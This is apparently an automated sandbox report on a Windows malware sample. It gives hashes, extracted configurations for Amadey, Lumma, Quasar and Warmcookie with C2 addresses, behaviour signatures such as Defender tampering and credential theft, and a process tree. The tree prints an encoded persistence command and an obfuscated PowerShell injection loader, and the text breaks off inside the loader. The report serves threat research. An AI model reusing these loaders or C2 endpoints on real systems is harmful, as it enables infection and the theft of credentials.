Analysis

  • max time kernel
    130s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/04/2025, 03:02

General

  • Target

    2025-04-02_d3d29d10fd881775b3d3bd74bf9a5eb4_black-basta_cobalt-strike_satacom.exe

  • Size

    725KB

  • MD5

    d3d29d10fd881775b3d3bd74bf9a5eb4

  • SHA1

    3c89e13c9a6447c909ea8c8bc6d60d1b0f7533d4

  • SHA256

    d60f7f3a2b46c6231734618eeddab803c3f29d0bb44b1e90dbbbc9f355a40931

  • SHA512

    19896d7385fa879b1f375e07934d5aa76c06651fe9c8f7019943b723bfbe826882c91c43831edd10054c8f4cc219f9783231fbf3c64e7f51491dbb1edec460f0

  • SSDEEP

    12288:UBTPqKVThZuF012wSa7M9PDVvQqj7Llhvmq9nv47wrcxx:KrqKVThf12wSa7M9LBQ6LlNv4c

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://rodformi.run/aUosoz

https://6jmetalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://qspacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://metalsyo.digital/opsa

https://spacedbv.world/EKdlsk

https://hadvennture.top/GKsiio

https://1ironloxp.live/aksdd

https://vspacedbv.world/EKdlsk

Extracted

Family

amadey

Version

5.33

Botnet

faec90

Attributes
  • install_dir

    52907c9546

  • install_file

    tgvazx.exe

  • strings_key

    cc9d94f7503394295f4824f8cfd50608

  • url_paths

    /Di0Her478/index.php

rc4.plain

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

C2

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes
  • encryption_key

    BF72099FDBC6B48816529089CF1CF2CF86357D14

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Modded Client Startup

  • subdirectory

    SubDir

Extracted

Family

warmcookie

C2

192.36.57.50

Attributes
  • mutex

    62580f79-f0e4-46c9-9fe6-041328dce2b7

  • user_agent

    Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Warmcookie family
  • Warmcookie, Badspace

    Warmcookie aka Badspace is a backdoor written in C++.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 26 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Sets file to hidden 1 TTPs 3 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 12 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 54 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads ssh keys stored on the system 2 TTPs

    Tries to access SSH used by SSH programs.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 3 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 57 IoCs
  • Enumerates processes with tasklist 1 TTPs 20 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 19 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 24 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 31 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 64 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 5 IoCs
  • NTFS ADS 1 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 23 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2576
      • C:\Windows\SysWOW64\svchost.exe
        "C:\Windows\System32\svchost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:5048
      • C:\Windows\SysWOW64\svchost.exe
        "C:\Windows\System32\svchost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:7808
    • C:\Users\Admin\AppData\Local\Temp\2025-04-02_d3d29d10fd881775b3d3bd74bf9a5eb4_black-basta_cobalt-strike_satacom.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-04-02_d3d29d10fd881775b3d3bd74bf9a5eb4_black-basta_cobalt-strike_satacom.exe"
      1⤵
      • Downloads MZ/PE file
      • Checks computer location settings
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2256
      • C:\Users\Admin\AppData\Local\hwFVkkSh5V45.exe
        "C:\Users\Admin\AppData\Local\hwFVkkSh5V45.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2204
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2924
          • C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe
            "C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:5704
            • C:\Users\Admin\Abspawnhlp.exe
              "C:\Users\Admin\Abspawnhlp.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:6008
              • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of WriteProcessMemory
                PID:3092
                • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                  C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                  7⤵
                  • Downloads MZ/PE file
                  • Checks computer location settings
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Modifies registry class
                  PID:5124
                  • C:\Windows\SysWOW64\msiexec.exe
                    "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000910271\FRDKTUCO.msi" /quiet
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2956
                  • C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe
                    "C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe"
                    8⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:3824
                    • C:\Users\Admin\Abspawnhlp.exe
                      "C:\Users\Admin\Abspawnhlp.exe"
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: MapViewOfSection
                      PID:5200
                      • C:\Users\Admin\Abspawnhlp.exe
                        C:\Users\Admin\Abspawnhlp.exe
                        10⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        PID:3116
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\SysWOW64\cmd.exe
                        10⤵
                        • System Location Discovery: System Language Discovery
                        PID:3700
                  • C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe
                    "C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe"
                    8⤵
                    • Executes dropped EXE
                    • Drops file in Windows directory
                    PID:2160
                  • C:\Windows\SysWOW64\msiexec.exe
                    "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000950271\UVXEUGTZ.msi" /quiet
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2676
                  • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                    "C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:4296
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 80
                      9⤵
                      • Program crash
                      PID:5664
                  • C:\Windows\SysWOW64\msiexec.exe
                    "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000970271\NBFRPMVB.msi" /quiet
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2384
                  • C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe
                    "C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe"
                    8⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:1444
                  • C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe
                    "C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe"
                    8⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:2788
                    • C:\Users\Admin\CamMenuMaker.exe
                      "C:\Users\Admin\CamMenuMaker.exe"
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: MapViewOfSection
                      PID:5664
                      • C:\Users\Admin\CamMenuMaker.exe
                        C:\Users\Admin\CamMenuMaker.exe
                        10⤵
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        PID:6352
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Enc UgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAJwB3AGkAdwBlAHIANwAuADUALgBlAHgAZQAnACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAdwBpAHcAZQByADcALgA1AC4AZQB4AGUAJwApACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0ATwBuAGMAZQAgAC0AQQB0ACAAKABHAGUAdAAtAEQAYQB0AGUAKQAgAC0AUgBlAHAAZQB0AGkAdABpAG8AbgBJAG4AdABlAHIAdgBhAGwAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBNAGkAbgB1AHQAZQBzACAANQApACkAIAAtAFUAcwBlAHIAIAAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlACAALQBSAHUAbgBMAGUAdgBlAGwAIABIAGkAZwBoAGUAcwB0ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0AUwBlAGMAbwBuAGQAcwAgADAAKQAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAKQAgAC0ARgBvAHIAYwBlAA==
                          11⤵
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          PID:11920
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\SysWOW64\cmd.exe
                        10⤵
                        • Drops file in Windows directory
                        • System Location Discovery: System Language Discovery
                        PID:5672
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\SysWOW64\cmd.exe
                  7⤵
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:5668
          • C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe
            "C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:5696
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1692
          • C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe
            "C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:64
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2492
          • C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe
            "C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:4712
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              5⤵
                PID:5804
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1056
            • C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe
              "C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:3756
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:3340
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"
              4⤵
              • System Location Discovery: System Language Discovery
              PID:3904
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"
                5⤵
                  PID:3548
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxw